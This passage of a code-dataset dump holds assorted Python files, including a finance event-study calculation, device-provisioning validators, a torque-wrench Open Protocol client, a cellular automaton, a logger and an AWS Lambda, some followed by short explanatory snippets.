start_year == 1986:\n start_year 
+= 1\n\n year_range = range(start_year, tmp_df.index[-1].year)\n for i in year_range:\n event_date = datetime.datetime(year=i, month=7, day=1)\n result_dict = {const.YEAR: i}\n\n has_value_flag = False\n\n for j in [1, 3, 4]:\n car_data, reason = car(tmp_df, event_date, j, -2, 2)\n if not np.isnan(car_data) and not has_value_flag:\n has_value_flag = True\n result_dict['{}_{}'.format(const.CAR, j)] = car_data\n\n if has_value_flag:\n result_df = result_df.append(result_dict, ignore_index=True)\n\n if result_df.empty:\n return pd.DataFrame()\n\n else:\n result_df.to_pickle(os.path.join(const.TEMP_PATH, 'temp_car_calculation', '{}.pkl'.format(permno)))\n return result_df\n\n\n def handle_data_frame(cusip_df):\n cusip = cusip_df[const.CUSIP8].dropna().iloc[0]\n # ticker = cusip_df.iloc[0][const.TICKER]\n promno = cusip_df.iloc[0]['PERMNO']\n return_df = format_crsp_df_and_calculate_car(cusip_df)\n if return_df.empty:\n return pd.DataFrame()\n else:\n return_df.loc[:, const.CUSIP8] = cusip\n return_df.loc[:, 'PERMNO'] = promno\n # return_df.loc[:, const.TICKER] = ticker\n # result_df_list.append(result_df)\n\n return return_df\n\n\n pool = pathos.multiprocessing.ProcessingPool(multiprocessing.cpu_count() - 3)\n # pool = multiprocessing.Pool(multiprocessing.cpu_count() - 3)\n\n print('Prepare multi processing')\n # cusip_list = list(set(crsp_df[const.CUSIP8]))\n # cusip_lists = np.array_split(cusip_list, multiprocessing.cpu_count() - 3)\n # cusip_dfs = [crsp_group.get_group(i) for i in cusip_list]\n permno_list = list(set(crsp_df['PERMNO']))\n # permno_lists = np.array_split(permno_list, multiprocessing.cpu_count() - 3)\n cusip_dfs = [crsp_group.get_group(i) for i in permno_list]\n # dfs_list = [[crsp_group.get_group(i) for i in j] for j in cusip_lists]\n\n print('start multi processing')\n result_dfs = pool.map(handle_data_frame, cusip_dfs)\n\n result_df = pd.concat(result_dfs, axis=0, ignore_index=True)\n\n print('Processing finished')\n result_df.to_pickle(os.path.join(const.TEMP_PATH, '20180204_crsp_car_calculation.pkl'))\n","sub_path":"new_project_file/step13_calculate_car_value.py","file_name":"step13_calculate_car_value.py","file_ext":"py","file_size_in_byte":9858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
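`car()` fits an OLS of daily stock returns on the factor columns over the pre-event window, then sums the prediction errors over the event window. A compact synthetic-data skeleton of that calculation (the real script pulls Fama-French factors and CRSP returns; the data here is random):

```python
import numpy as np
import pandas as pd
import statsmodels.api as sm

rng = np.random.default_rng(0)
n_train, n_event = 200, 5
factors = pd.DataFrame(rng.normal(0, 0.01, (n_train + n_event, 3)),
                       columns=['Mkt-RF', 'SMB', 'HML'])
returns = factors @ [1.0, 0.5, 0.3] + rng.normal(0, 0.005, n_train + n_event)

train_X, test_X = factors.iloc[:n_train], factors.iloc[n_train:]
train_y, test_y = returns.iloc[:n_train], returns.iloc[n_train:]

ols_result = sm.OLS(train_y, train_X).fit()
car = (test_y - ols_result.predict(test_X)).sum()   # cumulative abnormal return
print(round(car, 4))
```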
+{"seq_id":"152869256","text":"# -*- coding: utf-8 -*-\n\n\n'''\n 实现一个正整数的阶乘\n'''\n\n\ndef factorial(n):\n\tresult = n\n\n\tfor i in xrange(1, n):\n\t\tresult *= i\n\n\treturn result\n\n\nnumber = int(input(\"请输入一个正整数:\"))\nresult = factorial(number)\n\nprint(\"%d 的阶乘是%d\" % (number, result))\n","sub_path":"fishc/factorial_1.py","file_name":"factorial_1.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"271105673","text":"'''\nCreated on 25/02/2015\n\n:author: alfred\n'''\nfrom dirty_models.base import Unlocker\nfrom mc_be.commons.filter_list import FilterList, InList\nfrom mc_be.blueprints.dmm.device.filters import DeviceFilters\nfrom mc_be.blueprints.dmm.subscriber.services import subscriber_service\nfrom mc_be.commons.utils import get_attr_by_path\nfrom mc_be.blueprints.dmm.models import Links\nfrom mc_be.blueprints.dmm.box.services import box_provision_service\nfrom mc_be.blueprints.dmm.subscriptions.services import subscription_service\nfrom mc_be.blueprints.dmm.device.services import device_service\nfrom mc_be.blueprints.dmm.communications_module.services import communications_module_service\nfrom mc_be.blueprints.dmm.smip.validators import BoxProvisionPreValidate\nfrom mc_be.commons.services import ValidateError\n\n\nclass JobPreprocessor:\n\n params = {}\n\n def __init__(self, *args, **kwargs):\n if kwargs:\n self.params = kwargs\n\n def process(self, model):\n if not self.params:\n return\n operation_name = get_attr_by_path(model, 'request.name')\n if not isinstance(operation_name, str):\n return\n actions = get_attr_by_path(self.params, 'operations.' + operation_name, {})\n if not isinstance(actions, dict):\n return\n self._replace(model, actions)\n self._include(model, actions)\n self._exclude(model, actions)\n self._add(model, actions)\n self._remove(model, actions)\n\n def _add(self, model, actions):\n data = actions.get('add')\n if isinstance(data, dict):\n self._modify_model(model, data)\n\n def _remove(self, model, actions):\n fields = self._get_as_list(actions, 'remove')\n if isinstance(fields, list):\n self._modify_model(model, delete_fields=fields)\n\n def _include(self, model, actions):\n action_list = self._get_as_list(actions, 'include')\n if not action_list:\n return\n for action in action_list:\n parameter, data = self._get_data(model, action)\n if not isinstance(data, dict):\n return\n self._modify_model(model, data)\n\n def _exclude(self, model, actions):\n action_list = self._get_as_list(actions, 'exclude')\n if not action_list:\n return\n for action in action_list:\n parameter, fields = self._get_data(model, action)\n if not isinstance(fields, list):\n return\n self._modify_model(model, delete_fields=fields)\n\n def _replace(self, model, actions):\n action_list = self._get_as_list(actions, 'replace')\n if not action_list:\n return\n for action in action_list:\n parameter, data = self._get_data(model, action)\n if not isinstance(data, dict):\n return\n self._modify_model(model, data, delete_fields=[parameter])\n\n def _get_as_list(self, actions, option):\n action = actions.get(option)\n items = None\n if isinstance(action, (dict, str)):\n items = [action]\n elif isinstance(action, list):\n items = action\n return items\n\n def _get_data(self, model, action):\n if not isinstance(action.get('values'), dict):\n return None, None\n parameter = action.get('parameter')\n parameter_value = get_attr_by_path(model, 'request.parameters.{}'.format(parameter))\n if not isinstance(parameter_value, str):\n return None, None\n return parameter, action.get('values', {}).get(parameter_value)\n\n def _modify_model(self, model, data=None, delete_fields=None):\n with Unlocker(model):\n parameters = get_attr_by_path(model, 'request.parameters')\n if isinstance(delete_fields, list):\n for field in delete_fields:\n parameters.delete_attr_by_path(field)\n if data:\n parameters.import_data(data)\n\n\nclass DevicePreprocessor:\n\n def process(self, model):\n if not 
model.id:\n return\n\n with Unlocker(model):\n if not model.provision.custom_id:\n model.provision.custom_id = [model.id]\n\n if not model.provision.name:\n model.provision.name = [model.id]\n\n if not model.provision.description:\n model.provision.description = [model.id]\n\n\nclass ComModPreprocessor:\n\n def process(self, model):\n\n if not model.provision:\n return\n\n id = None\n if model.provision.imei and len(model.provision.imei) and model.provision.imei[0]:\n id = model.provision.imei[0]\n elif model.provision.mac_address and len(model.provision.mac_address) and model.provision.mac_address[0]:\n id = model.provision.mac_address[0].replace(':', '_')\n\n if id:\n with Unlocker(model):\n if not model.id:\n model.id = id\n if not model.provision.custom_id:\n model.provision.custom_id = [id]\n\n if not model.provision.name:\n model.provision.name = [id]\n\n if not model.provision.description:\n model.provision.description = [id]\n\n\nclass BoxPreprocessor:\n\n IMSI_NOT_RELATED = 'imsiNotRelated'\n IMSI_NOT_RELATED_MESSAGE = \"IMSI '{0}' not related to any ICC.\"\n\n ICC_NOT_RELATED = 'iccNotRelated'\n ICC_NOT_RELATED_MESSAGE = \"ICC '{0}' not related to any IMSI.\"\n\n def get_related_sim_info(self, model):\n \"\"\"\n Returns subscribers and subscriptions ids. If any imsi or icc is not found, raises ValidationError\n \"\"\"\n\n def raise_imsi_error(path, imsi):\n raise ValidateError(errors={path: {self.IMSI_NOT_RELATED: self.IMSI_NOT_RELATED_MESSAGE.format(imsi)}})\n\n def raise_icc_error(path, icc):\n raise ValidateError(errors={path: {self.ICC_NOT_RELATED: self.ICC_NOT_RELATED_MESSAGE.format(icc)}})\n\n def get_imsis_from_relation(item):\n relation_imsis = set()\n imsis_data = get_attr_by_path(item, 'provision.imsi')\n if imsis_data:\n relation_imsis = relation_imsis.union(set(imsis_data))\n imsis_data = get_attr_by_path(item, 'collection.inventory.imsiInfo')\n if imsis_data:\n relation_imsis = relation_imsis.union(set([get_attr_by_path(imsi, 'data.imsi')\n for imsi in imsis_data if imsi.get('data',\n {}).get('imsi')]))\n return relation_imsis\n\n def look_for_imsis_and_raise(imsis):\n if not model.subscriptions:\n return\n for a in range(len(model.subscriptions)):\n subscription = model.subscriptions[a]\n for i in range(len(subscription.provision.imsi)):\n imsi = subscription.provision.imsi[i]\n if imsi in imsis:\n raise_imsi_error('.'.join(['subscriptions', str(a), 'provision.imsi', str(i)]), imsi)\n\n def look_for_iccs_and_raise(iccs):\n if not model.subscribers:\n return\n for a in range(len(model.subscribers)):\n subscriber = model.subscribers[a]\n for i in range(len(subscriber.provision.icc)):\n icc = subscriber.provision.icc[i]\n if icc in iccs:\n raise_icc_error('.'.join(['subscribers', str(a), 'provision.icc', str(i)]), icc)\n\n iccs = set()\n imsis = set()\n\n found_iccs = set()\n found_imsis = set()\n\n try:\n for subscriber in model.subscribers:\n iccs = iccs.union(set(subscriber.provision.icc))\n for subscription in model.subscriptions:\n imsis = imsis.union(set(subscription.provision.imsi))\n except:\n pass\n\n if not iccs:\n look_for_imsis_and_raise(imsis)\n return [], []\n\n if not imsis:\n look_for_iccs_and_raise(iccs)\n return [], []\n\n # Get the whole information for subscribers to check that they have related imsis\n filter_list = FilterList([InList(filter_name=DeviceFilters.PROV_ICC, value=list(iccs))])\n subscribers = subscriber_service.list_all(filter_list)\n\n subscribers_ids = set()\n subscriptions_ids = set()\n for subscriber in subscribers:\n # Save 
subscriber on cache\n final_key = subscriber_service.cache.get_cache_key(subscriber.id)\n subscriber_service.cache.save(final_key, subscriber, [subscriber.id])\n subscribers_ids.add(subscriber.id)\n\n iccs_data = get_attr_by_path(subscriber, 'provision.icc')\n if iccs_data:\n found_iccs = found_iccs.union(set(iccs_data))\n\n iccs_data = get_attr_by_path(subscriber, 'collection.inventory.icc')\n if iccs_data:\n found_iccs = found_iccs.union(set([get_attr_by_path(icc, 'data')\n for icc in iccs_data if icc.get('data')]))\n\n relations = get_attr_by_path(subscriber, 'provision.relation')\n for relation in relations:\n if not relation.subscription:\n continue\n\n for subscription in relation.subscription:\n subscriptions_ids.add(get_attr_by_path(subscription, 'id'))\n found_imsis = found_imsis.union(get_imsis_from_relation(subscription))\n\n relations = get_attr_by_path(subscriber, 'collection.relation')\n for relation in relations:\n subscriptions = get_attr_by_path(relation, 'data.subscription')\n if not subscriptions:\n continue\n\n for subscription in subscriptions:\n subscriptions_ids.add(get_attr_by_path(subscription, 'id'))\n found_imsis = found_imsis.union(get_imsis_from_relation(subscription))\n\n missing_iccs = iccs.difference(found_iccs)\n if missing_iccs:\n look_for_iccs_and_raise(missing_iccs)\n\n missing_imsis = imsis.difference(found_imsis)\n if missing_imsis:\n look_for_imsis_and_raise(missing_imsis)\n\n return subscribers_ids, subscriptions_ids\n\n def _fill_relations(self, model):\n device_type = Links.ENTITY_TYPE_DEVICE\n\n model.relations = []\n\n for comm_mod in model.communications_modules:\n relation = box_provision_service.build_initial_relation_model({'links': [{'entityType': device_type,\n 'id': model.device.id}]})\n\n relation.links.append({'entityType': Links.ENTITY_TYPE_COMMS_MODULE,\n 'id': comm_mod.id})\n model.relations.append(relation)\n\n def process(self, model):\n if model.device:\n device_service.preprocess_model(model.device)\n\n if model.subscribers:\n for subscriber in model.subscribers:\n subscriber_service.preprocess_model(subscriber)\n\n if model.subscriptions:\n for subscription in model.subscriptions:\n subscription_service.preprocess_model(subscription)\n\n if model.communications_modules:\n for communications_module in model.communications_modules:\n communications_module_service.preprocess_model(communications_module)\n\n # 2. Fill relations\n if not model.relations:\n self._fill_relations(model)\n\n box_provision_service.validate(model, validator=BoxProvisionPreValidate())\n\n # 3. Delete subscribers and subscriptions\n del model.subscribers\n del model.subscriptions\n","sub_path":"mc-pybe-release-smip-R4/mc_be/blueprints/dmm/smip/preprocessors.py","file_name":"preprocessors.py","file_ext":"py","file_size_in_byte":11974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
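`BoxPreprocessor` validates SIM consistency with set differences between the identifiers requested and those actually found, raising a field-addressed error for anything left over. The core pattern, reduced to plain sets (values are illustrative):

```python
requested_iccs = {'8934-0001', '8934-0002', '8934-0003'}
found_iccs = {'8934-0001', '8934-0003'}

missing = requested_iccs.difference(found_iccs)
if missing:
    # The service wraps this in a ValidateError keyed by the offending field path
    raise ValueError('ICCs not related to any IMSI: %s' % sorted(missing))
```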
+{"seq_id":"299887750","text":"import ast\nimport csv\nimport json\nimport os\nimport socket\nimport sys\nimport time\nfrom array import array\n\nCSV_PATH = '/home/siemens/workspace/danfoss_atlas_wrench_datalog.csv'\nHEADER_LIST = ['Time Stamp', 'Parameter Set ID', 'Tightening Status', 'Torque', 'Angle']\nRECV_DATA_LENGTH = 1024\nTIME_OUT_ATLAS = 50\nRETRY_COUNTER = 5\nIP_DEFAULT = \"192.168.1.98\"\nPORT_DEFAULT = 4545\n\n# atlas application message ID\nMID0001_COMM_START = '00200001003000000000' # Application Communication start\nMID0003_COMM_STOP = '00200003001000000000' # Application Communication stop\nMID0018_SELECT_PSET = '00230018001000000000' # Select Parameter set (header+ID)\nMID0040_TOOL_DATA = '00200040002000000000' # Tool data upload request\nMID0060_TIGHT_RESU_SUBS = '00200060001100000000' # Last tightening result data subscribe\nMID9999_KEEP_ALIVE = '00209999000000000000' # Keep alive open protocol communication\n\nMID0061_TIGHT_RESU_CODE = '0061' # Last tightening result data\nMID0004_NEG_ACK_CODE = '0004' # Application Communication negative acknowledge\nMID9999 = '9999'\nKEEP_ALIVE_TIME_MAX = 10\nKEEP_ALIVE_RECV_DELAY = 4\nMID_CMD_SEND_DELAY = 1\n\n# byte number of MID9999 receive data\nHEADER_MID_START = 4\nHEADER_MID_END = 8\nDATA_MID_START = 25\nDATA_MID_END = 29\nPARA_SET_ID_START = 111\nPARA_SET_ID_END = 113\nTIGHT_STATUS_START = 128\nTIGHT_STATUS_END = 129\nTORQUE_START = 161\nTORQUE_END = 167\nANGLE_START = 190\nANGLE_END = 195\nTIME_STAMP_START = 197\nTIME_STAMP_END = 216\nPSET_DICT_DEFAULT = '{\"Pset\":\"002\"}'\n\n#TODO IP, Port shall be refactored to read from _device\n#Input Port: pset\ndef SPIDR_FB_Main(IP, Port, pset):\n\n #TODO This part shall be refactored to SPIDR implementation\n ip_socket = IP\n port_socket = int(Port)\n\n pset_dict[\"Pset\"] = pset\n\n client = AtlasClient(ip_socket, port_socket)\n client.start_comm()\n client.select_pset(pset_dict)\n client.tighten_result_subscribe()\n time.sleep(4)\n data = client.keep_alive()\n time.sleep(2)\n\n if len(data) < 1 or data is None:\n print(\"- ERROR: read atlas tightening resule data error\")\n else:\n print(\"- OK: log data\")\n check_log_file()\n print(\"- KK: log data 1111\")\n log_data(data)\n\n client.stop_comm()\n\n status = 0x00000000\n\n #Output Port: status\n return (status)\n\ndef check_log_file():\n print(\"- check log file existed or setup a new csv file\")\n\n # check the csv file and write the header\n if not os.path.exists(CSV_PATH):\n with open(CSV_PATH, 'w', encoding='utf-8') as f:\n header = HEADER_LIST\n csvwriter = csv.writer(f)\n csvwriter.writerow(header)\n f.close\n\ndef log_data(recv_data):\n print(\"- log data start\")\n print(\"- input data: %s, type: %s\" % (recv_data, type(recv_data)))\n\n # data extraction\n time_stamp_recv = recv_data[TIME_STAMP_START : TIME_STAMP_END]\n parameter_set_id_recv = recv_data[PARA_SET_ID_START : PARA_SET_ID_END]\n tightening_status_recv = recv_data[TIGHT_STATUS_START : TIGHT_STATUS_END]\n torque_recv = recv_data[TORQUE_START : TORQUE_END]\n angle_recv = recv_data[ANGLE_START : ANGLE_END]\n \n data_log = [time_stamp_recv, parameter_set_id_recv, tightening_status_recv, \n torque_recv, angle_recv]\n\n # write data to csv file\n with open (CSV_PATH, 'a', encoding='utf-8', newline='') as f:\n csvwriter = csv.writer(f)\n csvwriter.writerow(data_log)\n f.close\n print(\"- log data to csv file\")\n #return ()\n\n\n#@singleton\nclass AtlasClient(object):\n def __init__(self, ip=IP_DEFAULT, port =PORT_DEFAULT):\n counter = RETRY_COUNTER\n while counter > 
0:\n counter -= 1\n try:\n self.sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n except socket.error as msg:\n self.sk = None\n continue\n\n try:\n self.sk.connect((ip, port))\n print(\"--socket connect\")\n self.sk.settimeout(TIME_OUT_ATLAS)\n except socket.error as msg:\n self.sk.close()\n self.sk = None\n continue\n break\n\n def start_comm(self):\n mid_send = MID0001_COMM_START + chr(0)\n counter = RETRY_COUNTER\n while counter > 0:\n counter -= 1\n try:\n self.sk.sendall(mid_send.encode())\n print(\"--socket start communication\")\n data = self.sk.recv(RECV_DATA_LENGTH)\n data = data.decode()\n print(\"- start comm recv data: %s type: %s\" % (data, type(data)))\n mid_recv = data[HEADER_MID_START : HEADER_MID_END]\n print(\"- mid0001 feedback mid code\", mid_recv)\n if data is None :\n print(\"- ERROR: start communicaton feedback error\", mid_recv)\n #return None\n #return data.decode('utf-8')\n except socket.error as msg:\n print(msg)\n continue\n break\n\n def select_pset(self, pset_dict):\n pset_dict = json.loads(pset_dict)\n mid_send = MID0018_SELECT_PSET + pset_dict[\"Pset\"] + chr(0)\n counter = RETRY_COUNTER\n while counter > 0:\n counter -= 1\n try:\n self.sk.sendall(mid_send.encode())\n print(\"--socket select pset\")\n data = self.sk.recv(RECV_DATA_LENGTH)\n data = data.decode()\n print(\"- select pset recv data: %s\" % data)\n mid_recv = data[HEADER_MID_START : HEADER_MID_END]\n print(\"- mid0001 feedback mid code\", mid_recv)\n if len(data) < 1 or data is None:\n #return None\n print(\"- ERROR: select pset feedback error\", mid_recv)\n except socket.error as msg:\n print(msg)\n continue\n break\n\n def tighten_result_subscribe(self):\n mid_send = MID0060_TIGHT_RESU_SUBS + chr(0)\n counter = RETRY_COUNTER\n while counter > 0:\n counter -= 1\n try:\n self.sk.sendall(mid_send.encode())\n print(\"--socket tighten resulte subscribe\")\n data = self.sk.recv(RECV_DATA_LENGTH)\n data = data.decode()\n print(\"- select tighten recv data: %s\" % data)\n mid_recv = data[HEADER_MID_START : HEADER_MID_END]\n print(\"- mid0001 feedback mid code\", mid_recv)\n if len(data) < 1 or data is None:\n #return None\n print(\"- ERROR: tighten subscribe feedback error\", mid_recv)\n #self.keep_alive()\n except socket.error as msg:\n print(msg)\n continue\n break\n\n def keep_alive(self):\n mid_send = MID9999_KEEP_ALIVE + chr(0)\n counter = RETRY_COUNTER\n keep_alive_time = KEEP_ALIVE_TIME_MAX\n mid_recv = \"9999\"\n\n while counter > 0:\n counter -= 1\n try:\n while (mid_recv != MID0061_TIGHT_RESU_CODE):\n keep_alive_time -= 1\n self.sk.sendall(mid_send.encode())\n time.sleep(KEEP_ALIVE_RECV_DELAY)\n print(\"- keep alive loop start\")\n\n data = self.sk.recv(RECV_DATA_LENGTH)\n print(\"- mid9999 feedback data: %s, type: %s\" % (data, type(data)))\n data = data.decode()\n if len(data) < 1 or data is None:\n print(\"- ERROR: tighten subscribe feedback error\", mid_recv)\n return None\t\t\t\t\t\n\t\t\t\t\t\n mid_recv = data[DATA_MID_START : DATA_MID_END]\n print(\"- mid_recv[25:29]: %s, type: %s\" % (mid_recv, type(mid_recv))) \n if (mid_recv == MID0004_NEG_ACK_CODE):\n print(\"- ERROR: Error, code: \", mid_recv )\n return None\n\n if keep_alive_time < 1 :\n print(\"- ERROR: over the Max keep alive time\")\n return None\t\n\t\t\t\t\t\t\n print(\"## mid9999 feedback mid recv:%s, type:%s \" % (mid_recv, type(mid_recv)))\n print(\"- keep alive loop end\")\n\n return(data)\n\t\t\n except socket.error as msg:\n print(msg)\n continue\n break\t\t\n\n def stop_comm(self):\n mid_send = 
MID0003_COMM_STOP + chr(0)\n counter = RETRY_COUNTER\n while counter > 0:\n counter -= 1\n try:\n self.sk.sendall(mid_send.encode())\n print(\"--socket stop communication\")\n data = self.sk.recv(RECV_DATA_LENGTH)\n data = data.decode()\n print(\"- stop comm recv data: %s\" % data)\n mid_recv = data[HEADER_MID_START : HEADER_MID_END]\n print(\"- mid0001 feedback mid code\", mid_recv)\n if data is None :\n print(\"- ERROR: stop communicaton feedback error\", mid_recv)\n #return None\n #return data.decode('utf-8')\n except socket.error as msg:\n print(msg)\n continue\n break\n\n self.sk.close()\n print(\"--socket close\")\n self.sk = None\n\n\n#TODO This part shall be refactored to SPIDR implementation\nif __name__ == \"__main__\":\n SPIDR_FB_Main(IP_DEFAULT, PORT_DEFAULT)\n","sub_path":"creem/instance/_Reference/FBImport/Atlas.TorqueWrenchSkill.ScrewFastening.py","file_name":"Atlas.TorqueWrenchSkill.ScrewFastening.py","file_ext":"py","file_size_in_byte":9701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
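Open Protocol replies carry a four-digit MID at a fixed offset in the header, which the client slices out of the decoded payload. A standalone parse of a canned reply; per the protocol, MID 0005 is the positive counterpart of the 0004 negative acknowledge defined above:

```python
HEADER_MID_START, HEADER_MID_END = 4, 8

reply = '00200005001000000000'                 # canned acknowledge frame
mid = reply[HEADER_MID_START:HEADER_MID_END]
print(mid)                                     # '0005'
```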
+{"seq_id":"312001909","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nuniverse = {\"born\": [], \\\n \"live\": [], \\\n \"grid\": None \\\n }\n \n\ndef pad_to_2d(kernel, dims):\n\n mid_x = dims[0] // 2\n mid_y = dims[1] // 2 \n mid_k_x = kernel.shape[0] // 2\n mid_k_y = kernel.shape[1] // 2\n \n start_x = mid_x - mid_k_x\n start_y = mid_y - mid_k_y\n \n padded = np.zeros(dims)\n padded[mid_x-mid_k_x:mid_x-mid_k_x + kernel.shape[0],\n mid_y-mid_k_y:mid_y-mid_k_y + kernel.shape[1]] = kernel\n \n return padded\n\ndef ft_convolve(grid, kernel):\n\n grid2 = grid\n if np.shape(kernel) != np.shape(grid2):\n padded_kernel = pad_to_2d(kernel, grid2.shape)\n else:\n padded_kernel = kernel\n\n convolved = np.round(np.fft.ifftshift(np.abs(np.fft.ifft2(\\\n np.fft.fft2(np.fft.fftshift(grid2)) \\\n * np.fft.fft2(np.fft.fftshift(padded_kernel))))))\n\n return convolved \n\ndef ca_update(grid, rules):\n\n kernel = np.ones((3,3))\n kernel[1,1] = 0\n\n moore_grid = ft_convolve(grid, kernel)\n\n new_grid = np.zeros_like(grid)\n\n \n for birth in rules[0]:\n new_grid[((moore_grid == birth) * (grid == 0))] = 1\n\n for survive in rules[1]:\n new_grid[((moore_grid == survive) * (grid == 1))] = 1\n\n return new_grid\n\ndef ca_steps(universe, steps):\n\n for step in range(steps):\n\n universe[\"grid\"] = ca_update(universe[\"grid\"], [universe[\"born\"], universe[\"live\"]])\n\n\n return universe\n\nif __name__ == \"__main__\":\n\n obs_dim = 64\n universe[\"born\"] = [3]\n universe[\"live\"] = [2,3]\n\n universe[\"grid\"] = np.zeros((obs_dim, obs_dim))\n \n universe[\"grid\"][34, 32] = 1\n universe[\"grid\"][35, 32:34] = 1\n universe[\"grid\"][36, 31] = 1\n universe[\"grid\"][36, 33] = 1\n\n plt.figure()\n plt.imshow(universe[\"grid\"])\n\n\n universe = ca_steps(universe, 1)\n\n\n plt.figure()\n plt.imshow(universe[\"grid\"])\n\n universe = ca_steps(universe, 1)\n\n\n plt.figure()\n plt.imshow(universe[\"grid\"])\n universe = ca_steps(universe, 1)\n\n\n plt.figure()\n plt.imshow(universe[\"grid\"])\n plt.show()\n\n","sub_path":"src/life_like.py","file_name":"life_like.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"420224733","text":"from __future__ import absolute_import\nimport sys\nimport time\nimport datetime\nimport six\nfrom threading import Timer\n\nclass GeneralLogger(object):\n def __init__(self, logFD=None, job_backend=None, error=False):\n self.error = error\n self.job_backend = job_backend\n self.buffer = ''\n self.last_timer = None\n self.last_messages = ''\n\n self.terminal = sys.__stdout__ if error is False else sys.__stderr__\n self.logFD = logFD\n\n def get_time(self):\n ts = time.time()\n st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n\n return st + '.' + str(ts % 1)[2:6]\n\n def get_line(self, line):\n if line:\n return \"[%s] %s\\n\" % (self.get_time(), line)\n\n return line\n\n def fileno(self):\n return sys.__stdout__.fileno() if self.error is False else sys.__stderr__.fileno()\n\n def flush(self):\n if self.logFD:\n self.logFD.flush()\n\n self.terminal.flush()\n\n def send_to_buffer(self):\n self.last_timer = None\n\n if self.buffer:\n if self.logFD:\n self.logFD.write(self.buffer)\n\n if self.job_backend and self.job_backend.running:\n self.job_backend.write_log(self.buffer)\n\n self.buffer = ''\n\n def write(self, message):\n\n # if message == '\\n':\n # return\n\n message = six.text_type(message)\n\n # if not self.error:\n # message = self.get_line(message)\n\n try:\n self.terminal.write(message)\n\n self.last_messages += message\n if len(self.last_messages) > 500 * 1024:\n self.last_messages = self.last_messages[-500 * 1024:]\n\n for char in message:\n if '\\b' == char:\n self.buffer = self.buffer[:-1]\n else:\n self.buffer += char\n except:\n self.last_messages = ''\n self.buffer = ''\n pass\n\n if not self.last_timer:\n self.last_timer = Timer(1.0, self.send_to_buffer)\n self.last_timer.start()","sub_path":"aetros/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"348125339","text":"from __future__ import print_function # Python 2/3 compatibility\nimport boto3\nimport json\nimport uuid\n\ndef lambda_handler(event, context):\n\n recordIds = []\n for record in event['Records']:\n recordId = str(uuid.uuid4())\n messageId = record['messageId']\n senderId = record['attributes']['SenderId']\n sentTimestamp = record['attributes']['SentTimestamp']\n body = record['body']\n\n if isinstance(body, str):\n body = json.loads(body)\n \n addlInfo = { '_status': 'New', \"_id\": recordId, '_messageid': messageId, '_senderId': senderId, '_sentTimestamp': sentTimestamp }\n body.update(addlInfo)\n \n db = boto3.resource('dynamodb', region_name='us-east-1')\n table = db.Table('Syntinel')\n \n table.put_item(Item=body)\n recordIds.append(recordId)\n \n response = {\n \"statusCode\": 200,\n \"messageId\": messageId,\n \"processed\": len(event['Records']),\n \"recordIds\": recordIds\n }\n \n return response","sub_path":"scripts/POC/01 - SQS to Dynamo.py","file_name":"01 - SQS to Dynamo.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"630012535","text":"#!/usr/bin/env python3\n\n# Built-in lib imports\nimport time, random, struct, pickle\n\n# Standard Library imports\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\n# Third-Party imports\nimport b0RemoteApi\nimport torch.nn as nn\nimport torch\nimport torch.optim as optim\nfrom scipy import ndimage\nimport torch\nfrom torch.autograd import Variable\nimport cv2\nimport os\n\n\nimport skimage.transform as trans\n# from utils_warp import convert_image_np, normalize_transforms, rotatepoints, show_image\nfrom utils import get_heightmap, get_input_tensors, get_prepared_img, \\\n transform_position_cam_to_global, euler2rotm, isRotm, depth_img_from_bytes, \\\n rgb_img_from_bytes\n\n\nfrom model import reinforcement_net\nimport logger\n\n\n\nwith b0RemoteApi.RemoteApiClient('b0RemoteApi_V-REP','b0RemoteApi', timeout=5) as client:\n\n # Make sure simulation is not running\n client.simxStopSimulation(client.simxDefaultPublisher())\n\n # Global variables\n doNextStep = True\n rgb_vision_msg = None\n d_vision_msg = None\n\n\n ##########################\n # Callbacks\n\n # Callbacks\n def simulationStepStarted(msg):\n # simTime=msg[1][b'simulationTime'];\n # print('Simulation step started. Simulation time: ',simTime)\n pass\n\n def simulationStepDone(msg):\n global doNextStep\n doNextStep = True\n\n #######################\n\n\n ##########################\n # Robot Class\n\n class Robot():\n def __init__(self, USE_CUDA=False):\n # Create object handles\n _, self.target_right_handle = client.simxGetObjectHandle(\"UR5_target\", client.simxServiceCall())\n _, self.connector_handle = client.simxGetObjectHandle('RG2_attachPoint', client.simxServiceCall())\n _, self.sensor_handle = client.simxGetObjectHandle('RG2_attachProxSensor', client.simxServiceCall())\n _, self.gripper_joint_handle = client.simxGetObjectHandle('RG2_openCloseJoint', client.simxServiceCall())\n _, self.cube_handle = client.simxGetObjectHandle(\"cube\", client.simxServiceCall())\n _, self.right_force_sensor_handle = client.simxGetObjectHandle(\"RG2_rightForceSensor\", client.simxServiceCall())\n _, self.vision_sensor_handle = client.simxGetObjectHandle('vision_sensor', client.simxServiceCall())\n _, self.side_vision_sensor_handle = client.simxGetObjectHandle('side_vision_sensor', client.simxServiceCall())\n\n # Parameters\n self.use_cuda = USE_CUDA\n self.explore_prob = 0.5\n self.learning_rate = 1e-4\n self.future_reward_discount = 0.5\n self.explore_rate_decay = True\n self.experience_replay = True\n self.label_value_log = []\n self.reward_value_log = []\n self.predicted_value_log = []\n self.executed_action_log = []\n\n # Initialize Huber loss\n self.criterion = torch.nn.SmoothL1Loss(reduce=False) # Huber loss\n if self.use_cuda:\n self.criterion = self.criterion.cuda() \n\n # Q-Network\n self.model = reinforcement_net(use_cuda=self.use_cuda)\n if self.use_cuda:\n self.model = self.model.cuda()\n\n # Initialize optimizer\n self.optimizer = torch.optim.SGD(self.model.parameters(), lr=self.learning_rate, momentum=0.9, weight_decay=2e-5)\n\n self.logger = logger.Logger(False, './logs')\n\n # not 